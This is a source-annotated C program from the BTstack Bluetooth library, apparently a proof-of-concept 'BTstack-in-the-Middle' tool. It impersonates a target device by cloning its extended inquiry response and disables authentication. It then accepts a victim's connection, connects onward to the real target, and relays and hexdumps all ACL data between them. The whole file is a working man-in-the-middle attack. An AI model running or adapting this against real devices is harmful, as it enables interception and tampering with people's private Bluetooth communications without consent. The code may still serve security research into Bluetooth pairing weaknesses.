2009-08-24 21:56:12 +00:00
|
|
|
/*
|
|
|
|
* test.c
|
|
|
|
*
|
|
|
|
* Created by Matthias Ringwald on 7/14/09.
|
|
|
|
*/
|
|
|
|
|
|
|
|
#include <unistd.h>
|
|
|
|
#include <stdio.h>
|
|
|
|
#include <stdlib.h>
|
|
|
|
#include <strings.h>
|
|
|
|
|
2009-09-28 21:19:05 +00:00
|
|
|
#include <btstack/btstack.h>
|
2009-08-24 21:56:12 +00:00
|
|
|
|
2009-08-25 21:40:17 +00:00
|
|
|
#define NAME "BTstack-in-the-Middle"
|
2009-08-24 21:56:12 +00:00
|
|
|
#define EIR_LEN 240
|
|
|
|
|
2009-08-25 19:44:27 +00:00
|
|
|
// there is the target: BOB
|
|
|
|
bd_addr_t bob_addr;
|
|
|
|
uint8_t bob_EIR[EIR_LEN];
|
2009-08-24 21:56:12 +00:00
|
|
|
hci_con_handle_t bob_handle = 0;
|
2009-08-25 19:44:27 +00:00
|
|
|
uint16_t bob_clock_offset;
|
|
|
|
uint8_t bob_page_scan_repetition_mode;
|
|
|
|
uint8_t bob_got_EIR = 0;
|
|
|
|
|
|
|
|
// here's ALICE who wants to talk to BOB
|
2009-08-24 21:56:12 +00:00
|
|
|
hci_con_handle_t alice_handle = 0;
|
2009-08-25 19:44:27 +00:00
|
|
|
|
|
|
|
//
|
|
|
|
bd_addr_t temp_addr;
|
2009-08-24 21:56:12 +00:00
|
|
|
uint8_t inquiry_done = 0;
|
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
void packet_handler(uint8_t packet_type, uint8_t *packet, uint16_t size){
|
2009-08-24 21:56:12 +00:00
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
hci_con_handle_t acl_in;
|
|
|
|
hci_con_handle_t acl_out;
|
2009-08-24 21:56:12 +00:00
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
switch (packet_type){
|
2009-08-25 21:40:17 +00:00
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
case HCI_ACL_DATA_PACKET:
|
|
|
|
acl_in = READ_ACL_CONNECTION_HANDLE(packet);
|
|
|
|
acl_out = 0;
|
|
|
|
if (acl_in == alice_handle) {
|
|
|
|
printf("Alice: ");
|
|
|
|
hexdump( packet, size );
|
|
|
|
printf("\n\n");
|
|
|
|
acl_out = bob_handle;
|
|
|
|
}
|
|
|
|
if (acl_in == bob_handle) {
|
|
|
|
printf("Bob: ");
|
|
|
|
hexdump( packet, size );
|
|
|
|
printf("\n\n");
|
|
|
|
acl_out = alice_handle;
|
2009-08-25 21:40:17 +00:00
|
|
|
}
|
2009-10-05 22:06:12 +00:00
|
|
|
if (acl_out){
|
|
|
|
bt_store_16( packet, 0, (READ_BT_16(packet, 0) & 0xf000) | acl_out);
|
|
|
|
bt_send_acl(packet, size);
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
|
|
|
|
case HCI_EVENT_PACKET:
|
|
|
|
|
|
|
|
switch(packet[0]){
|
|
|
|
|
|
|
|
case BTSTACK_EVENT_STATE:
|
|
|
|
// bt stack activated, get started - set local name
|
|
|
|
if (packet[2] == HCI_STATE_WORKING) {
|
|
|
|
bt_send_cmd(&hci_write_local_name, NAME);
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
|
|
|
|
case HCI_EVENT_EXTENDED_INQUIRY_RESPONSE:
|
|
|
|
// process EIR responses
|
|
|
|
if (packet[17]) {
|
|
|
|
bt_flip_addr(temp_addr, &packet[3]);
|
|
|
|
if (BD_ADDR_CMP(temp_addr, bob_addr)) {
|
|
|
|
printf("2. Got BOB's EIR. ");
|
|
|
|
int i, k;
|
|
|
|
bzero(bob_EIR, EIR_LEN);
|
|
|
|
for (i=17, k=0;i<EIR_LEN && packet[i]; i += packet[i] + 1, k += bob_EIR[k] + 1){
|
|
|
|
if (packet[i+1] == 0x09) {
|
|
|
|
// complete name id -- use own
|
|
|
|
bob_EIR[k+0] = 1 + strlen(NAME);
|
|
|
|
bob_EIR[k+1] = 0x09;
|
|
|
|
memcpy(&bob_EIR[k+2], NAME, strlen(NAME));
|
|
|
|
} else {
|
|
|
|
// vendor specific
|
|
|
|
if (packet[i+1] == 0x0ff ) {
|
|
|
|
bob_got_EIR = 1;
|
|
|
|
}
|
|
|
|
memcpy(&bob_EIR[k], &packet[i], packet[i]+1);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
hexdump(&bob_EIR, k);
|
|
|
|
printf("\n\n");
|
|
|
|
bob_clock_offset = READ_BT_16(packet, 14);
|
|
|
|
bob_page_scan_repetition_mode = packet[9];
|
|
|
|
}
|
|
|
|
|
|
|
|
// stop inquiry
|
|
|
|
// bt_send_cmd(&hci_inquiry_cancel);
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
|
|
|
|
case HCI_EVENT_CONNECTION_REQUEST:
|
|
|
|
// accept incoming connections
|
|
|
|
bt_flip_addr(temp_addr, &packet[2]);
|
|
|
|
if (BD_ADDR_CMP(temp_addr, bob_addr) ){
|
|
|
|
printf("-> Connection request from BOB. Denying\n");
|
|
|
|
// bt_send_cmd(&hci_accept_connection_request, &temp_addr, 1);
|
|
|
|
} else {
|
|
|
|
printf("-> Connection request from Alice. Sending Accept\n");
|
|
|
|
bt_send_cmd(&hci_accept_connection_request, &temp_addr, 1);
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
|
|
|
|
case HCI_EVENT_CONNECTION_COMPLETE:
|
|
|
|
// handle connections
|
|
|
|
bt_flip_addr(temp_addr, &packet[5]);
|
|
|
|
if (packet[2] == 0){
|
|
|
|
hci_con_handle_t incoming_handle = READ_BT_16(packet, 3);
|
|
|
|
if (BD_ADDR_CMP(temp_addr, bob_addr)){
|
|
|
|
bob_handle = incoming_handle;
|
|
|
|
printf("7. Connected to BOB (handle %u). Relaying data!\n", bob_handle);
|
|
|
|
} else {
|
|
|
|
alice_handle = incoming_handle;
|
|
|
|
printf("6. Alice connected (handle %u). Connecting to BOB.\n", alice_handle);
|
|
|
|
bt_send_cmd(&hci_create_connection, &bob_addr, 0x18, bob_page_scan_repetition_mode, 0, 0x8000 || bob_clock_offset, 0);
|
|
|
|
}
|
|
|
|
} else {
|
|
|
|
printf("Connection complete status %u for connection", packet[2]);
|
|
|
|
print_bd_addr(temp_addr);
|
|
|
|
printf("\n");
|
|
|
|
}
|
|
|
|
break;
|
2009-08-25 21:40:17 +00:00
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
case HCI_EVENT_PIN_CODE_REQUEST:
|
|
|
|
// inform about pin code request
|
|
|
|
printf("Please enter PIN 1234 on remote device\n");
|
|
|
|
break;
|
|
|
|
|
|
|
|
case HCI_EVENT_DISCONNECTION_COMPLETE:
|
|
|
|
// connection closed -> quit test app
|
|
|
|
printf("Basebank connection closed, exit.\n");
|
|
|
|
exit(0);
|
|
|
|
break;
|
|
|
|
|
|
|
|
case HCI_EVENT_COMMAND_COMPLETE:
|
|
|
|
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_write_local_name) ) {
|
|
|
|
bt_send_cmd(&hci_write_class_of_device, 0x7A020C); // used on iPhone
|
|
|
|
}
|
|
|
|
|
|
|
|
// use pairing yes/no
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_write_class_of_device) ) {
|
|
|
|
bt_send_cmd(&hci_write_authentication_enable, 0);
|
|
|
|
}
|
|
|
|
|
|
|
|
// allow Extended Inquiry responses
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_write_authentication_enable) ) {
|
|
|
|
bt_send_cmd(&hci_write_inquiry_mode, 2);
|
|
|
|
}
|
|
|
|
|
|
|
|
// get all events, including EIRs
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_write_inquiry_mode) ) {
|
|
|
|
bt_send_cmd(&hci_set_event_mask, 0xffffffff, 0x1fffffff);
|
|
|
|
}
|
|
|
|
|
|
|
|
// fine with us, too
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_set_event_mask) ) {
|
|
|
|
bt_send_cmd(&hci_write_simple_pairing_mode, 1);
|
|
|
|
}
|
|
|
|
|
|
|
|
// start inquiry
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_write_simple_pairing_mode) ) {
|
|
|
|
// enable capure
|
|
|
|
bt_send_cmd(&btstack_set_acl_capture_mode, 1);
|
|
|
|
|
|
|
|
printf("1. Started inquiry.\n");
|
|
|
|
bt_send_cmd(&hci_inquiry, HCI_INQUIRY_LAP, 15, 0);
|
|
|
|
}
|
|
|
|
// Connect to BOB
|
|
|
|
if ( COMMAND_COMPLETE_EVENT(packet, hci_write_extended_inquiry_response) ) {
|
|
|
|
printf("5. Waiting for Alice!...\n");
|
|
|
|
// bt_send_cmd(&hci_write_scan_enable, 3); // 3 inq scan + page scan
|
|
|
|
// bt_send_cmd(&hci_create_connection, &addr, 0x18, page_scan_repetition_mode, 0, 0x8000 || clock_offset, 0);
|
|
|
|
}
|
|
|
|
break;
|
|
|
|
|
|
|
|
default:
|
|
|
|
// Inquiry done, set EIR
|
|
|
|
if (packet[0] == HCI_EVENT_INQUIRY_COMPLETE || COMMAND_COMPLETE_EVENT(packet, hci_inquiry_cancel)){
|
|
|
|
if (!inquiry_done){
|
|
|
|
inquiry_done = 1;
|
|
|
|
printf("3. Inquiry Complete\n");
|
|
|
|
if (bob_got_EIR){
|
|
|
|
printf("4. Set EIR to Bob's.\n");
|
|
|
|
bt_send_cmd(&hci_write_extended_inquiry_response, 0, bob_EIR);
|
|
|
|
} else {
|
|
|
|
// failed to get BOB's EIR
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
break;
|
2009-08-24 21:56:12 +00:00
|
|
|
}
|
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
default:
|
|
|
|
break;
|
2009-08-24 21:56:12 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
int main (int argc, const char * argv[]){
|
|
|
|
// parse addr of Bob
|
|
|
|
uint8_t ok = 0;
|
|
|
|
if (argc >= 2) {
|
2009-08-25 19:44:27 +00:00
|
|
|
ok = sscan_bd_addr((uint8_t *) argv[1], bob_addr);
|
2009-08-24 21:56:12 +00:00
|
|
|
}
|
|
|
|
if (!ok) {
|
|
|
|
printf("Usage: mitm 12:34:56:78:9A:BC\n");
|
|
|
|
exit(0);
|
|
|
|
}
|
|
|
|
|
|
|
|
// start stack
|
2009-10-07 20:17:19 +00:00
|
|
|
run_loop_init(RUN_LOOP_POSIX);
|
2009-08-24 21:56:12 +00:00
|
|
|
int err = bt_open();
|
|
|
|
if (err) {
|
|
|
|
printf("Failed to open connection to BTdaemon\n");
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
printf("BTstack-in-the-Middle started, will pretend to be BOB (");
|
2009-08-25 19:44:27 +00:00
|
|
|
print_bd_addr(bob_addr);
|
2009-08-24 21:56:12 +00:00
|
|
|
printf(")\n");
|
|
|
|
|
2009-10-05 22:06:12 +00:00
|
|
|
bt_register_packet_handler(packet_handler);
|
2009-08-24 21:56:12 +00:00
|
|
|
bt_send_cmd(&btstack_set_power_mode, HCI_POWER_ON );
|
|
|
|
run_loop_execute();
|
|
|
|
bt_close();
|
|
|
|
}
|